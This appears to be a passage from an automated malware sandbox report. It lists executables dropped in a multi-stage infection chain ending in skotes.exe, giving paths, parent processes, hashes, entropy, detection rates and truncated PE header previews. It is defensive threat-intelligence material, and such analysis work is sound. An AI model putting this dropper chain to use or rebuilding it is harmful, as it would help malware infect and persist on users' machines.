                                                                                                                                                                                                                                                          SHA-256:D6C86D327990446DAA297077154ADF2C5D25A685E899786E9F668B4D388ABE95
                                                                                                                                                                                                                                                          SHA-512:3FD0DFECB5C5B1CC04EB59F9FD91DFCED5DD4FB07406CDF342103BD8CAC41A6934F6EFB75C2BD946CCE1BD420A6159C030F95CF209CB721F19F29167C9E53B84
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^........K...........@...........................L.....}\....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... ..)..........V..............@...vxwcoufq......1......X..............@...pnspstga......K......2..............@....taggant.0....K.."...6..............@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):21504
                                                                                                                                                                                                                                                          Entropy (8bit):5.336742061370928
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:JiynHMEyyp/He7ik+KcJB669mNPBqVgYERHtNNVYISZS1d7RroV5:PHvtm7ik+KcJB6jRHkISZShkn
                                                                                                                                                                                                                                                          MD5:14BECDF1E2402E9AA6C2BE0E6167041E
                                                                                                                                                                                                                                                          SHA1:72CBBAE6878F5E06060A0038B25EDE93B445F0DF
                                                                                                                                                                                                                                                          SHA-256:7A769963165063758F15F6E0CECE25C9D13072F67FA0D3C25A03A5104FE0783A
                                                                                                                                                                                                                                                          SHA-512:16B837615505F352E134AFD9D8655C9CABFA5BFCFBEE2C0C34F2D7D9588AA71F875E4E5FEB8CDF0F7BACC00F7C1CA8DABD3B3D92AFC99ABF705C05C78E298B4A
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pm;..........."...0..J..........:i... ........@.. ....................................`..................................h..O...................................Th..8............................................ ............... ..H............text...@I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................i......H........6..p1...........................................................0..8.......s2.....(....}<.....}=.....};....|<.....(...+.|<...(....*.0..P........~.........,B.r...p(.....rc..p(.....(.....r...p.(....(......(....o......(......*.0..8.......s,.....(....}......}......}.....|......(...+.|....(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):765568
                                                                                                                                                                                                                                                          Entropy (8bit):7.855393940952922
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:4mOcxtujRb4+DR8KwzkS5AMtCxCz3z8JAS3p9+TPtN4+DR8KwzkS5AMtCxCz3z8U:lGtPWQ8C8z3zcB59CNPWQ8C8z3zcB590
                                                                                                                                                                                                                                                          MD5:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                                                                                          SHA1:00296EA6A56F6E10A0F1450A20C5FB329B8856C1
                                                                                                                                                                                                                                                          SHA-256:3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                                                                                                                                                                                                                                                          SHA-512:1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\4l693L.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Tii6ue74NB.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1738752
                                                                                                                                                                                                                                                          Entropy (8bit):7.933717694746982
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:kNoW4u4q0eGw93C3ajZlGmOQRbO5tbgJDTth9:kN0W93FWQR0tiR/
                                                                                                                                                                                                                                                          MD5:D9B889B6E46AD453EFB9E4D78E03CFBC
                                                                                                                                                                                                                                                          SHA1:62A8D76D7E04D6A09EB32E605A28364CD30B5701
                                                                                                                                                                                                                                                          SHA-256:91B3A5BAA6CC1114D93AC44AF1270D61F71B6E3C3A53979FEC6549B3E31E6BFA
                                                                                                                                                                                                                                                          SHA-512:83797F34A78F97647F6A260324C24960FBBB5F6EC3116F4DB1831361979B3E048DB0D757D16242B3257C5980B2B53B9CDFCD3302AED7B24274FAC9E2AA496D40
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... E.. ...`....@.. .......................`E.....L.....`.................................U...i....`..D........................................................................................................... . .@... ....... ..............@....rsrc...D....`.......2..............@....idata . ...........6..............@... . *..........8..............@...qpxzdhbb.@....*..(...:..............@...imlhbikp. ....E......b..............@....taggant.@... E.."...f..............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Tii6ue74NB.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5476352
                                                                                                                                                                                                                                                          Entropy (8bit):7.994797407491875
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:98304:C+rXP8Lbxzy+QHnqwgQ3UjZqz9wwRPoqC4enTf0o/piI4X7Pj0C3lBl5NFN6:C+rXPWc+Q/gQrzSmAV4yf7xin7AWl5E
                                                                                                                                                                                                                                                          MD5:C597FB849B6B2BB18895B7D0337644D7
                                                                                                                                                                                                                                                          SHA1:5F0AD1B5D67E8B6F26189C9FD81CB70298BC6CFC
                                                                                                                                                                                                                                                          SHA-256:9550FB74121F74A66DA8AAA70D7514A2465432BCC298CB1FC1A57312953B5DFD
                                                                                                                                                                                                                                                          SHA-512:8E47310C9C2ABABDD9305126DBEA8D6C79EC156B6DAB40D6253FC23266F9D6F1F3A7AE280B0B0F9D16966AFA194394E85075D0316E63B5C849356FA316FA4565
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...(S.....`j............@...........................S.......S...@...... ......................................(.S...................S.........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc.....S.......S..|..............@..@.reloc........S.......S.............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2940416
                                                                                                                                                                                                                                                          Entropy (8bit):6.542154611234877
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:Gq6A25xT5M2UKvxvqcv2BAUCzFsJUHMMVLSZFNAd3+eaBNhkf1XXz8KaJOUYZbHj:T6BllTxycv2ORuUbpqSNz8lt9woJ/bo
                                                                                                                                                                                                                                                          MD5:527B76DD8DE1219705E08C1B7201AE32
                                                                                                                                                                                                                                                          SHA1:A5104085B7AF40BD0DF6745ECCAC7958E420AA60
                                                                                                                                                                                                                                                          SHA-256:FCAB4F9D0CB6621427CCF79BA2B4999EDF5113F33D3E4EA2A8B939ECC2D2F0D2
                                                                                                                                                                                                                                                          SHA-512:470F7CC12C998B4EE0AA1E36433563E5F83BDD1A0C48659FDD5A8217EDC7F5C4AD4090A4CFF28DC1E79700902837C6BB942C00ECFAB034F2127FDB647D6199F3
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........P...........@..........................@P.....7.-...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...mtxeekvl.@+...$..<+..|..............@...yfmqoglc......P.......,.............@....taggant.0....P.."....,.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3714560
                                                                                                                                                                                                                                                          Entropy (8bit):7.990515722960005
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:98304:3T/Sw/qfEdG0lciqw/bCRVtPqdYw9ePGVs/bn800oizZl:3T/SwMX0l5/b1dJIei/40LeZ
                                                                                                                                                                                                                                                          MD5:B2F8BAD322CF8F7619A7C5FF151C984B
                                                                                                                                                                                                                                                          SHA1:5AEE311EA195AD1B5F714734FFB2DBB25B3FAC9A
                                                                                                                                                                                                                                                          SHA-256:20359E0A8EF74F253B073B18D587E26AB47FA41728AD6B5B557C6E1E14A12BA7
                                                                                                                                                                                                                                                          SHA-512:48E986DB3FCAC0CFC4BED2691A13298518D154AF3EB2B052D6604508366ECDD2B8E2C9C7B248047AA9DB2FDB6BAAD1C9E3485FB846E2157D1A23FC85703F117C
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...F8.....`j............@...........................9......9...@...... ......................................X&8...................8.........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....08......(8..|..............@..@.reloc........8.......8.............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3008512
                                                                                                                                                                                                                                                          Entropy (8bit):6.58783107820754
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:XTJjZdsdiRYaCGZPNYWJuwrAZRvE5JitgU7sT/8az/tBBTgmEg:XTJjZdsdiRYTaNYWJuwsLvEnpU7Ta/J0
                                                                                                                                                                                                                                                          MD5:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          SHA1:CC80C76F29701DB1DC2862D0BA28BD6A15495DB1
                                                                                                                                                                                                                                                          SHA-256:C0645847E49AB8E30B22D510DB3B31C8CB9E7301FA599C2CDACF4978F340ABC8
                                                                                                                                                                                                                                                          SHA-512:62E312E1A75B8ACD276B7FB6BFAFB9DC4568F81415931B860CB5354BA3C3E0A0F0F2DFA683AABC69569E6B0E7D0BD830259B65E63AF09EA0F3EC43BA58FB46F4
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....x.....@.................................W...k............................{1..............................z1..................................................... . ............................@....rsrc...............................@....idata ............................@...odogmioi..*.......*.................@...qyfccaeh......1.......-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1865216
                                                                                                                                                                                                                                                          Entropy (8bit):7.946772710295766
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:TJVMcG3U3NJTuJyaZ0Vvss5Tu+lUEUCj7/lXm4cAe:Ah3anwyE0G+ufalm
                                                                                                                                                                                                                                                          MD5:C55AABF570C84E3060DF0D997F2BFB33
                                                                                                                                                                                                                                                          SHA1:8D2FD3178F3B1865C759E2DF6CE3B9E889EF1FF4
                                                                                                                                                                                                                                                          SHA-256:EDA1F4FDB57FDAB8E38C18EB512BAF9D23F244D03C7EC2A022BAC98E681FE91B
                                                                                                                                                                                                                                                          SHA-512:8B7683BDA774816158BED0A8B8D58342037EF51558B6F6827D5A80DE89C1C31F732A632C4407144732064DE2302E77E74409710A303B8BAD827020EC5B2458F5
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...jxigntbe....../......^..............@...dmgkcopc......I......P..............@....taggant.0....I.."...T..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_402rl4td.s12.ps1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zeeoufd.ome.ps1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ikesbb2.lum.psm1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edmj3uiy.uhf.ps1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ias3i2u5.gmv.psm1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inm51udx.wxs.ps1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0hjl2kv.yky.psm1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkk0cr4e.rdo.psm1

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3008512
                                                                                                                                                                                                                                                          Entropy (8bit):6.58783107820754
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:XTJjZdsdiRYaCGZPNYWJuwrAZRvE5JitgU7sT/8az/tBBTgmEg:XTJjZdsdiRYTaNYWJuwsLvEnpU7Ta/J0
                                                                                                                                                                                                                                                          MD5:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          SHA1:CC80C76F29701DB1DC2862D0BA28BD6A15495DB1
                                                                                                                                                                                                                                                          SHA-256:C0645847E49AB8E30B22D510DB3B31C8CB9E7301FA599C2CDACF4978F340ABC8
                                                                                                                                                                                                                                                          SHA-512:62E312E1A75B8ACD276B7FB6BFAFB9DC4568F81415931B860CB5354BA3C3E0A0F0F2DFA683AABC69569E6B0E7D0BD830259B65E63AF09EA0F3EC43BA58FB46F4
